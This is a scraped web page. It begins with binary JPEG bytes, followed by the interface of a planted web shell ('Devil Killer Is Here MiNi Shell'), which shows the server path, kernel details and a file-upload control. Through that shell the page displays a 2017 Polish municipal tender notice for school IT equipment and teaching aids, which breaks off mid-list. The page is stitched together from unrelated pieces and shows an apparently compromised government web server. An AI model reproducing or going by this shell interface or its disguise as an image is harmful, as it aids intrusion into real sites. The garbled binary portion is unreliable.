JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170322/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20170322/49106-N-2017.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://bip.zblewo.pl/.' target='_blank'>http://bip.zblewo.pl/.</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 49106 - 2017
              z dnia 2017-03-22 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Zblewo: Przetargu nieograniczony na dostawę urządzeń i sprzętu komputerowego Technologii Informacyjno-Komunikacyjnych (TIK), wyposażenia cyfrowych pracowni językowych, oprogramowania oraz pomocy dydaktycznych, dla 5 szkół z terenu Gminy Zblewo
<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Dostawy
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                tak
              </div><br /><b>Nazwa projektu lub programu</b><br />Poznawanie przez działanie kluczem do sukcesu  wyrównywanie szans edukacyjno - rozwojowych uczniów szkół Gminy Zblewo, współfinansowanego ze środków Europejskiego Funduszu Społecznego w ramach Regionalnego Programu Operacyjnego dla Województwa Pomorskiego na lata 2014-2020, Poddziałanie 3.2.1 Jakość edukacji ogólnej, Działanie 3.2 Edukacja ogólna, Oś Priorytetowa 3 Edukacja</div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Gmina Zblewo, krajowy numer identyfikacyjny
              549803000000, ul.
              ul. Główna 
              40,
              83210  
              Zblewo, woj.
              pomorskie, państwo
              Polska, tel.
              585 884 381, e-mail
              gmina@zblewo.pl, faks
              585 884 569.
              <br />
              Adres strony internetowej (URL): http://www.zblewo.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />http://bip.zblewo.pl/.</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />http://bip.zblewo.pl/.</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />pisemnie<br />
                Adres:
                <br />Urząd Gminy w  Zblewie, Ul. Główna 40, 83-210 Zblewo.</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Przetargu nieograniczony na dostawę urządzeń i sprzętu komputerowego Technologii Informacyjno-Komunikacyjnych (TIK), wyposażenia cyfrowych pracowni językowych, oprogramowania oraz pomocy dydaktycznych, dla 5 szkół z terenu Gminy Zblewo
<br /><b>Numer referencyjny: </b>RO.271.13.2017<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                dostawy
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>1. Przedmiotem zamówienia jest dostawa urządzeń i sprzętu komputerowego Technologii Informacyjno-Komunikacyjnych (TIK), wyposażenia cyfrowych pracowni językowych, oprogramowania oraz pomocy dydaktycznych, dla 5 szkół z terenu Gminy Zblewo, w ramach projektu Poznawanie przez działanie kluczem do sukcesu  wyrównywanie szans edukacyjno - rozwojowych uczniów szkół Gminy Zblewo, współfinansowanego ze środków Europejskiego Funduszu Społecznego w ramach Regionalnego Programu Operacyjnego dla Województwa Pomorskiego na lata 2014-2020, Poddziałanie 3.2.1 Jakość edukacji ogólnej, Działanie 3.2 Edukacja ogólna, Oś Priorytetowa 3 Edukacja.
2. Przedmiot zamówienia dzieli się na 2 części i obejmuje: 
2.1 część 1  urządzenia multimedialne, wyposażenie i sprzęt komputerowy TIK
1) zestawy interaktywne  10 szt.:
a) tablica interaktywna  10 szt. 
b) projektor  10 szt.
     2) oprogramowanie tematyczne do tablicy interaktywnej:
a)	oprogramowanie do nauki matematyki, klasy 1,2,3 szkoły podstawowej   5 szt.
b)	oprogramowanie do nauki przyrody, dla klasy 46 szkoły podstawowej  5 szt.
c)	oprogramowanie do nauki biologii dla klasy 1,2,3 gimnazjum  5 szt.
d)	oprogramowanie do nauki fizyki dla klasy 1,2,3 gimnazjum  5 szt.
e)	oprogramowanie do nauki chemii dla klasy 1,2,3 gimnazjum  5 szt.
3) komputery przenośne (laptopy) - 10 zestawów, zestaw komputerowy będzie składał się z:
a)	komputera przenośnego, 
b)	systemu operacyjnego,
c)	oprogramowania dodatkowego (w tym oprogramowania do zarządzania pracownią mobilną), 
d)	oprogramowania instalacyjnego pakietu biurowego, 
e)	licencji oprogramowania antywirusowego. 
4) urządzenie wielofunkcyjne  1 szt.
5) wyposażenie cyfrowych pracowni językowych  2 kpl
6) ekran elektryczny  1 szt.
2.2. część 2 pomoce dydaktyczne:
1)	mikroskop USB- 2 szt. 
2)		szkielet człowieka (model)  2 szt.
3)	szkielet gołębia  2 szt.
4)	szkielet ryby  2 szt.
5)	szkielet jaszczurki  2 szt. 
6)	szkielet żaby  2 szt. 
7)	szkielet szczura  2 szt.
8)	zestaw do wody  2 szt.  
9)	preparaty mikroskopowe do zoologii  2 szt.
10)	preparaty mikroskopowe	 do botaniki  2 szt.
11)	preparaty biologiczne- anatomia człowieka	2 szt.
12)	teleskop  2 szt. 
13)	mikroskop optyczny  8 szt. 
14)	korpus człowieka - model anatomiczny	2 szt. 
15)	mikroskop terenowy  4 szt. 
16)	rękawice do gorących przedmiotów  30 szt. 
17)	waga elektroniczna  8 szt. 
18)	lupa 7 szt. 
19)	lornetka  2 szt. 
20)	podwójna lupa  60 szt. 
21)	kompas  10 szt. 
22)	probówka szklana  4 szt. 
23)	stojak do probówek  10 szt. 
24)	kolba szklana  40 szt. 
25)	zlewki miarowe (borokrzemian.)  40 szt. 
26)	menzurki - 40 szt. 
27)	palnik alkoholowy - 	10 szt. 
28)	mały szkielet człowieka  2 szt. 
29)	szalka petriego 90 x 15 mm  20 szt. 
30)		szalka petriego 100 x 15 mm  20 szt. 
31)	elektroskop  10 szt. 
32)	pałeczki szklane	10 szt. 
33)	pałeczki ebonitowe	10 szt. 
34)		termometr elektroniczny z ruchomą głowicą 	10 szt. 
35)		cylindry miarowe (borokrzemian.) 100 ml	30 szt. 
36)	cylindry miarowe (borokrzemian.), 50 ml	30 szt. 
37)	zestaw przyrządów do samodzielnego wykonania preparatu -zestaw 7 szt	60 zest.
38)	akwarium 40x100x50 cm  2 szt. 
39)	szkiełka podstawowe zestaw 50 szt.	20 zest. 
40)	szkiełka zegarkowe  komplet po 3 sztuki	20 kompletów. 
41)	pęsetki duże	60 szt. 
42)	pudełko na 50 szkiełek 	20 szt. 
43)	deszczomierz	8 szt. 
44)	mobilna stacja pogodowa	 - 2 szt. 
45)	wiatromierz	2 szt.
46)	skały osadowe. kolekcja	 - 2 szt. 
47)	minerały. kolekcja	2 szt. 
48)	podstawowe obwody elektryczne zestaw	 - 10 szt. s
49)	stoper	30 szt. 
50)	komora próżniowa - zestaw do eksperymentów  20 szt. 
51)	kwasomierz	30 szt. 
52)	Polska. Ochrona przyrody/mapa do ćwiczeń	2 szt.
53)	globus fizyczny, śr. 220 mm, wys. 30 cm	20 szt. 
54)	globus fizyczny, śr. 42 cm, wys. 62 cm	2 szt. 
55)	globus 250- konturowy z objaśnieniem	20 szt. 
56)	Tarcza Newtona	10 szt. 
57)	mapa fizyczna. Europa 100 x 140 cm	2 szt. 
58)	Niebezpieczne zwierzęta i rośliny w Polsce. Plansza	2 szt.
59)	Grzyby trujące i niejadalne - plansza, wym. 90 x 120 cm	 - 2 szt. 
60)	Pustynia Sahara. Plansza	- 2 szt. 
61)	Sawanna afrykańska. Plansza	2 szt. 
62)	Dżungla afrykańska. Plansza	2 szt. 
63)	Dżungla amazońska. Plansza	2 szt. 
64)	Ameryka Północna. Plansza	2 szt. 
65)	Arktyka. Plansza	2 szt. 
66)	Azja Południowo-Wschodnia. Plansza	2 szt. 
67)	Azja Środkowa. Plansza  2 szt. 
68)	Australia. Plansza	2 szt. 
69)	Rafa koralowa. Plansza	 - 2 szt. 
70)	Porosty - budowa i skala porostowa. Plansza	2 szt. 
71)	Narządy zmysłów. Plansza	2 szt. 
72)	plansza budowa kwiatu	- 2szt.
73)	plansza budowy dziobów - 	2 szt. 
74)	profil glebowy plansza	 - 2 szt. 
75)	plansza etapy rozwoju  człowieka	 - 2 szt. 
76)	Chmury i ich rodzaje. Plansza	2 szt. 
77)	Obieg wody w przyrodzie, plansza	 - 2 szt. 
78)	fartuchy	30 szt. 
79)	okulary ochronne	30 szt. 
80)	rękawice diagnostyczne winylowe bezpudrowe 100 sztuk 	10 opakowań
81)	model skóry	2 szt. 
82)	serce. model demonstracyjny	2 szt. 
83)	ciśnieniomierz zegarowy ze stetoskopem	2 szt. 
84)	miara zwijana 30 m	30 szt. 
85)	Generator van de Graffa  1 szt. 
86)	waga elektroniczna- 5 szt. 
87)	czajnik elektryczny  1 szt. 
88)	poziomica laserowa	4 szt. 
89)	suwmiarka demonstracyjna	4 szt. 
90)	palnik gazowy	2 szt. 
91)	miara zwijana 30 m	4 szt.
92)	tęczowa sprężynka	10 szt. 
93)	zestaw badacza magnetycznych atrakcji	10 szt. 
94)	waga sprężynowa. skala: 250 g - 2,5 n	4 	4 szt. 
95)	waga sprężynowa. skala: 500 g - 5 n	4 szt. 
96)	waga sprężynowa. skala:  1000 g - 10n	4 szt. 
97)	waga sprężynowa. skala: 2000 g - 20 n	4 szt. 
98)	waga sprężynowa. skala: 5000 g - 50 n	4 szt.
99)	zasilacz prądu stałego - 	1 szt. 
100)	miernik uniwersalny z osobnym gniazdem	2 szt. 
101)	izolowane przewody	4 szt. 
102)	opornik drutowy w obudowie	4 szt. 
103)	żarówka z oprawką	10 szt. 
104)	waga sprężynowa. skala: 250 g - 2,5 n	4 szt. 
105)	waga sprężynowa. skala: 500 g - 5 n	- 4 szt. 
106)	waga sprężynowa. skala:  1000 g - 10n  4 szt. 
107)	waga sprężynowa. skala: 2000 g - 20 n	 - 4 szt. 
108)	waga sprężynowa. skala: 5000 g - 50 n	- 4 szt. 
109)	zestaw odważników	- 4 szt. 
110)	soczewka skupiająca	4 szt. 
111)	soczewka rozpraszająca	4 szt. 
112)	pryzmat	2 szt. 
113)	rurka do demonstracji	4 szt. 
114)	Zestaw z magnesami	4 szt. 
115)	statyw 	4 szt. 
116)	gra bingo angielskie	2 szt. 
117)	gra bingo zwierzęta 2 szt. 
118)	gra bingo artykuły spożywcze 	1 szt. 
119)	kostki do konwersacji, nauka j. angielskiego	2 szt. 
120)	edukacyjne kostki obrazkowe	2 szt. 
121)	edukacyjne kostki -  opowiadanie, pisanie	2 szt.
122)	słownictwo podstawowe j. angielski, karty edukacyjne	2 szt. 
123)	domino edukacyjne  j. angielski 2 szt. 
124)	karty edukacyjne, nauka j. angielskiego 2 szt. 
125)	j. angielski dla dzieci - karty obrazkowe	2 szt. 
126)	waga elektroniczna	10 szt. 
127)	zestaw odczynników i chemikaliów dla gimnazjów	5 szt. 
128)	mikroskop 	10 szt. 
129)	zegar szachowy	8 szt. 
130)	mały szkielet człowieka	2 szt. 
131)	walizka do obserwacji oraz badania wód i ph gleb	3 szt. 
132)	szachy szkolne drewniane	2 szt. 
133)	mapa fizyczna. Świat	1 szt. 
134)	mapa fizyczna. Europa	1 szt. 
135)	mapa ogólno geograficzna/ Podział administracyjny. Polska	2 szt. 
136)	mapa Krajobrazy i strefy klimatyczne. Świat  - 	1 szt. 
137)	edukacyjny program multimedialny do terapii logopedycznej -	5 szt<br /><br /><b>II.5) Główny kod CPV: </b>32322000-6<br /><b> Dodatkowe kody CPV:</b>30200000-1,
                38653400-1,
                48190000-6,
                38000000-5,
                39162100-6<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    Okres w dniach: 30<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                1) w zakresie części 1: 
wykonawca, w okresie ostatnich 3 lat, przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, wykonał należycie minimum dwa zamówienia, na dostawę sprzętu Technologii Informacyjno-Komunikacyjnych, o wartości każdego z nich nie niższej niż 80 000 zł brutto; z których co najmniej jedno obejmowało dostawę sprzętu komputerowego i co najmniej jedno - dostawę zestawów interaktywnych składających się z tablic interaktywnych i projektorów multimedialnych,
2) w zakresie części 2:
wykonawca, w okresie ostatnich 3 lat, przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, wykonał należycie minimum dwa zamówienia, na dostawę pomocy dydaktycznych, o wartości minimum 80 000 zł brutto każde,
Do pomocy dydaktycznych zamawiający nie zalicza: mebli do pomieszczeń, wyposażenia placów zabaw, sprzętu audiowizualnego oraz IT.
<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  nie
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px"></div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />wykaz dostaw wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, wraz z podaniem ich przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy zostały wykonane, z załączeniem dowodów określających czy te dostawy zostały wykonane należycie, lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego usługi były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów  oświadczenie wykonawcy; przypadku świadczeń okresowych lub ciągłych nadal wykonywanych, referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px">dla części 1 urządzenia multimedialne, wyposażenie i sprzęt komputerowy TIK: 
1)	karty katalogowe, lub specyfikacje techniczne zawierające parametry ofertowanego sprzętu (dla wszystkich urządzeń poz. 1-5), karta katalogowa komputera powinna zawierać wyraźne zdjęcia obudowy oferowanego komputera
2)	dla tablicy interaktywnej z poz. 1a
a) zaświadczenie niezależnego podmiotu zajmującego się poświadczaniem zgodności działań Wykonawcy z normami jakościowymi, potwierdzające spełnienie wymagań systemów zarządzania ochroną środowiska, w szczególności certyfikat zgodności z normą PN-EN ISO 14001:2005 lub inne równoważne zaświadczenie wystawione przez podmioty mające siedzibę w innym państwie członkowskim Europejskiego Obszaru Gospodarczego lub inne dokumenty potwierdzające stosowanie przez Wykonawcę równoważnych środków zapewnienia jakości,
b)	deklaracja zgodności CE
2) dla projektorów multimedialnych z poz. 1b
a)	zaświadczenie niezależnego podmiotu zajmującego się poświadczaniem zgodności działań Wykonawcy z normami jakościowymi, potwierdzające, iż system zarządzania jakością Wykonawcy spełnia wymagania zawarte w normie serii PN-EN ISO 9001, lub inne równoważne zaświadczenie wystawione przez podmioty mające siedzibę w innym państwie członkowskim Europejskiego Obszaru Gospodarczego lub inne dokumenty potwierdzające stosowanie przez Wykonawcę równoważnych środków zapewnienia jakości,
b)	zaświadczenie niezależnego podmiotu zajmującego się poświadczaniem zgodności działań Wykonawcy z normami jakościowymi, potwierdzające spełnienie wymagań systemów zarządzania ochroną środowiska, w szczególności certyfikat zgodności z normą PN-EN ISO 14001:2005 lub inne równoważne zaświadczenie wystawione przez podmioty mające siedzibę w innym państwie członkowskim Europejskiego Obszaru Gospodarczego lub inne dokumenty potwierdzające stosowanie przez Wykonawcę równoważnych środków zapewnienia jakości,
c)	deklaracja zgodności CE
3) dla laptopów z poz. 3
